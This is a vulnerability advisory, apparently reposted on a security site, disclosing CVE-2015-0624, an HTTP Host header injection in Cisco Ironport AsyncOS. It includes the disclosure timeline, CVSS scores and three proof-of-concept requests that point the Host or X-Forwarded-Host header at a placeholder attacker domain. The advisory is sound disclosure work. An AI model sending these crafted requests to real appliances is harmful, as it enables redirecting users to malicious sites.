Cisco Ironport AsyncOS HTTP Header Injection

2015.02.25
Credit: Glafkos Charalambous
Risk: Low
Local: No
Remote: Yes
CVE: CVE-2015-0624
CWE: CWE-20


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

Cisco Ironport AsyncOS HTTP Header Injection Vendor: Cisco Product webpage: http://www.cisco.com Affected version(s): Cisco Ironport ESA - AsyncOS 8.0.1-023 Cisco Ironport WSA - AsyncOS 8.5.5-021 Cisco Ironport SMA - AsyncOS 8.4.0-138 Date: 24/02/2015 Credits: Glafkos Charalambous CVE: CVE-2015-0624 Disclosure Timeline: 28-10-2014: Vendor Notification 28-10-2014: Vendor Response/Feedback 22-01-2015: Vendor Fix/Patch 20-02-2015: Vendor Advisory Release 24-02-2015: Public Disclosure Description: Cisco AsyncOS is vulnerable to unauthenticated HTTP Header Injection, caused by improper validation of user supplied input when handling HTTP Host and X-Forwarded-Host request headers. An attacker is able to inject crafted HTTP headers that could cause a web page redirection to a malicious website. PoC #1 GET https://ironport:8443/network/wga_ip_interfaces HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 DNT: 1 Cookie: sid=jdLIhsguH36OUkUZqSpn; authenticated=pME7nskMH6zQ6JmonjZd Connection: keep-alive Content-Length: 0 Host: ironport:8443:@[attacker.com] PoC #2 GET https://ironport:8443/network/wga_ip_interfaces HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 DNT: 1 Cookie: sid=jdLIhsguH36OUkUZqSpn; authenticated=pME7nskMH6zQ6JmonjZd Connection: keep-alive Content-Length: 0 Host: [attacker.com] PoC #3 GET https://ironport:8443/monitor/wsa_user_report HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 DNT: 1 Cookie: sid=jdLIhsguH36OUkUZqSpn; authenticated=pME7nskMH6zQ6JmonjZd Connection: keep-alive Host: ironport:8443 X-Forwarded-Host: [attacker.com] References: http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2015-0624 -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.22 (MingW32) mQENBFE6TCMBCADQKVLT3xkJDQpUE6M3akJdFRWgFEy2pwoDbnOGDhw6yQYObDEuUlixRV5u xaIwzh9xPSS36B72bhQC3isHuqDu3xVhx9OX7XlLheXDZJdRbNIXQ3YPk1uYQizuoIpHq08x Eq4V2CXq7ovZPhWI6+iJt6QkVYvZXJdyoTKT8bLaFSOEfLeyAgkCQdXOgnzmNWeedxp0xGAj KL7qIhLETp/MK46ndo5hF8RIbVs59gWdu4GxXr96qViJLiAYO1dQNLc+LShMnue91neTjLoe JkpgqLfEGKV459eCJNqxlylIVbxyTmigExftZKAdNFHat0txK0fB/bLOwRnNFqYWQxanABEB AAG0KEdsYWZrb3MgQ2hhcmFsYW1ib3VzIDxnbGFma29zQGdtYWlsLmNvbT6JATgEEwECACIF AlE6TCMCGw8GCwkIBwMCBhUIAgkKCwQWAgMBAh4BAheAAAoJEHAhLSD814yOAcoIALO6d2AQ M0l9KD9hPIody4VYOgY8stBrumI+t8njzJOYCCLdzB781vCAa0vINPFuFxGp2e8EfMfvf8+Z S6kC8EOQ6XyC8eq6imc1Q+tFMwTgykJZPFdosfXjBwg9jos/CR4dI6RZuzGC/FdXjpTAypbE n3m2a+DBb6CUPeB9nVQq6ukRGbuZ8S+veWRNFwKkTSwC0HKtf9Od+JBrLKesNa3LWLo8q7+d V3VS8rf8cmOOGBuaITzj87iRpgAgkF3MATa1Vb2nbbdYMpvHbzoj62mSqRiyEp1SOY9XkgcL 2ORsjgjww7GpH3F8LFvaHSHVz+037+E/+i/OSTS7o6gY4eI= =yiro -----END PGP SIGNATURE-----

References:

http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2015-0624


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top